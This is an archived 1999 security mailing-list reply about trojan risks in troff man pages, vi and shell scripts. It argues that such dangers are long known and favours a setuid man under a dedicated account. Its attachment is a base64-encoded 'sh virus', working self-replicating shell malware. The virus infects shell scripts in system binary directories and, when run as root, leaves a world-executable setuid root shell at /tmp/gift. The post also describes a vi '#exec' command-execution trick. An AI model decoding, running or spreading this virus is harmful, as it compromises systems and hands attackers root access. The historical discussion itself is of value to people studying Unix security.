Re: Troff dangerous.

From: Pete (shipleyat_private)
Date: Sun Jul 25 1999 - 17:59:23 PDT

Next message: Nic Bellamy: "Re: Troff dangerous."

Previous message: .rain.forest.puppy.: "Re: Alert: RDS IIS vulnerability/fix"
Maybe in reply to: Pawel Wilk: "Troff dangerous."
Next in thread: Nic Bellamy: "Re: Troff dangerous."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <28766.932950763.1at_private>

>On Fri, Jul 23, 1999 at 10:16:42PM +0200, Pawel Wilk wrote:
>>
>> If you want your system safe,
>> don't look as root
>> at manual page.
>
>Don't look at them _at_all_ before checking them for dangerous troff-commands
>I'd say. In the end of my message I have included the shellfunction I use to
>check manual pages before installing them / viewing them..
>
>What this also means is SGID man is probably not a good idea (a method that is
>used to avoid having the preformatted manualpage cache, catman, directories
>worldwriteable).

<RANT>
    This is not a *new* security problem, thus has been known for
    decades and ranks with trojan in VI and TeX and sh shell ( I will
    attach a sh shell virus

    I believe it was Spafford that published a worm or virus written in TeX
    but I can't locate it in my security archives at the moment.   I am sure
    someone on this list has a copy.

    Also in VI it is/was (depending on your system and which version of VI you
    have installed) possible to have arbitrary commands executed as the file
    was edited.


    I believe the syntax was

	#exec  <command>

    and it had to be one of the first five lines in the file



    Thus you would update your warning  to be:

	when root dont edit files, read man pages or print TeX documents
	or run commands.

    Also don't forget to have set messages to off so people can't bounce
    command off your terminals status line (aka: the "25th" line)


</RANT>

But as for your statement I would prefer a setuid/gid man (to a dedicated
uid and gid) thus *when* your troff is compromised. It will not have the
authority to compromise your system.







------- =_aaaaaaaaaa0
Content-Type: plain/text
Content-ID: <28766.932950763.2at_private>
Content-Description: sh virus
Content-Transfer-Encoding: base64

IyEgL2Jpbi9zaAooICAgZm9yIGkgaW4gKiAvYmluLyogL3Vzci9iaW4vKiAvdXNyL3VjYi8qIC91
c3IvbmV3LyoKICAgIGRvICBpZiBzZWQgMXEgJGkgfCBncmVwICdeIyFbICAgICAgICBdKi9iaW4v
c2gnCiAgICAgICAgdGhlbiBpZiBncmVwICdeIyBtYXJrJCcgJGkKICAgICAgICAgICAgdGhlbiA6
CiAgICAgICAgICAgIGVsc2UgdHJhcCAicm0gLWYgL3RtcC8kJCIgMCAxIDIgMTMgMTUKICAgICAg
ICAgICAgICAgIHNlZCAxcSAkaSA+IC90bXAvJCQKICAgICAgICAgICAgICAgIHNlZCAnMWQKICAg
ICAgICAgICAgICAgICAgICAvXiMgbWFyayQvcScgJDAgPj4gL3RtcC8kJAogICAgICAgICAgICAg
ICAgc2VkIDFkICRpID4+IC90bXAvJCQKICAgICAgICAgICAgICAgIGNwIC90bXAvJCQgJGkKICAg
ICAgICAgICAgZmkKICAgICAgICBmaQogICAgZG9uZQogICAgaWYgbHMgLWwgL3RtcC8kJCB8IGdy
ZXAgcm9vdAogICAgdGhlbiBybSAvdG1wL2dpZnQKICAgICAgICAgY3AgL2Jpbi9zaCAvdG1wL2dp
ZnQKICAgICAgICAgY2htb2QgNDc3NyAvdG1wL2dpZnQKICAgICAgICAgZWNobyBnaWZ0IHwgbWFp
bCByb290QGxvY2FsaG9zdAogICAgZmkKICAgIHJtIC90bXAvJCQKKSA+L2Rldi9udWxsIDI+L2Rl
di9udWxsICYKI21hcmsKCgoK

------- =_aaaaaaaaaa0--

Next message: Nic Bellamy: "Re: Troff dangerous."
Previous message: .rain.forest.puppy.: "Re: Alert: RDS IIS vulnerability/fix"
Maybe in reply to: Pawel Wilk: "Troff dangerous."
Next in thread: Nic Bellamy: "Re: Troff dangerous."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:33 PDT